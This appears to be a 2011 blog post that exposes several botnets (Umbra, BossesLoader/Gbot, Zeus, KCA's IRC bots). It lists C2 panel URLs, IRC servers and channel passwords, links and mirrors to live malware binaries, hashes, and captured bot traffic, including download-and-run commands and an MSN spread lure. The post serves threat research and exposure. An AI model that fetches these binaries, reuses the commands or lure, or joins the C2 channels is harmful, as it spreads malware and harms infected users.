Criminal's AIM Screen name: kenunloaded
Panel:
http://193.107.16.134/umbra/Panel/bot.php
http://193.107.16.134/umbra/Panel/
Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=a47b0bd0d9bbd556bf21ada7f93f4018840b1d13357c4cc4a74e1b3a525dbd1b-1316067901
Analysis:
http://anubis.iseclab.org/?action=result&task_id=112aa04a16b3ba5d4b1afdf650ebd2f6f
http://www.threatexpert.com/report.aspx?md5=75e415e752846645ae89b9a4ea1180a6
Hosted with:
http://www.ideal-solution.org/
http://whois.domaintools.com/193.107.16.134
Bot(for further analysis):
http://www.mediafire.com/?xj1t1r7okqzjae7
http://www.multiupload.com/O65NGRDB9P
Exposed Botnets
Wednesday, September 14, 2011
Monday, September 12, 2011
BossesLoader + Gbot
(HTTP Side)BossesLoader:
http://3v.irc.su/CET/Panel/
http://3v.irc.su/CET/Panel/bot.php
Post data made from bot:
mode=1
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
Bot responding to a command:
mode=2
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
version=0.2.0
Process the bot runs as (Win7/Vista):
C:\Users\\AppData\Local\wincsrss.exe
Now we get into the IRC side of this criminal's server.
(Irc Side)GBot:
Server: 94.23.252.85:4747 (channel: #Gbot)
Topic On: [ #Gbot ] [ !prot http://3v.irc.su/gbot.exe 1 ]
Topic By: [ Ted ]
Hosting Info:
http://whois.domaintools.com/94.23.252.85
(France Ovh Systems)
Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=76d385c04e71cd4808059eebeb459c12fa092c405fac226eb0743ad6f44885c7-1315872197
Analysis:
http://www.threatexpert.com/report.aspx?md5=ea78961231a757f5a592948df290d5d2
http://anubis.iseclab.org/?action=result&task_id=1de6c531e3e513e94ddb15212a0be92d8
Connects to irc server: 94.23.252.85:4747
Irc Conversations:
NICK n{USA|XP}erafhjg
USER n{USA|XP}erafhjg 0 0 :n{USA|XP}erafhjg
JOIN #Gbot GTFO
afhjg 0 0 :n{USA|XP}erafhjg
PONG :7110E098
PRIVMSG #Gbot :[FileProt]: File protection has been enabled for C:\WINDOWS\system32\Dwdjqfihf.exe
Bot reuploaded (For any further analyses):
http://www.mediafire.com/?utnq797aqbp69b2
http://www.multiupload.com/89FOAW25BF
Zeus hosted with Turkey Eskisehir National Academic Network And Information Center
http://193.255.81.157/cp.php
Hosting:
http://whois.domaintools.com/193.255.81.157
Hosted with: http://www.ulakbim.gov.tr/ (Possibly a hacked server)
Zeus hosted in Lithuania Siauliai Splius Uab
http://charityforcancer.info/donate/help/therapy/funds/thanks/cp.php
Registrar: GoDaddy.com Inc. (R171-LRMS)
Ip: 77.79.9.208
Hosting:
http://www.aleja.lt/
http://whois.domaintools.com/77.79.9.208
Bot:
http://charityforcancer.info/donate/help/therapy/funds/thanks/bot.exe
http://www.mediafire.com/?t42w7wbnh09r7ku
http://www.multiupload.com/MQ3D3TYBE0
Analysis:
http://www.threatexpert.com/report.aspx?md5=8da8384d5602a83b26683bb931769d60
http://anubis.iseclab.org/?action=result&task_id=14d3ea94794834874e582da5b36a31e41
Config:
http://charityforcancer.info/donate/help/therapy/funds/thanks/config.bin
http://www.mediafire.com/?pq0ji6a6c9edaf7
http://www.multiupload.com/785DXO2WZ0
KCA's Botnet
BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net
Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN
Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe
RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe
DorkBot/NgrBot Variants:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe
Other bots used:
The IRC also uses Aryan bot; I was unable to acquire an .exe at the time of this analysis.
Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB
KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"
bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"
images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA
vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA
bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="
enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b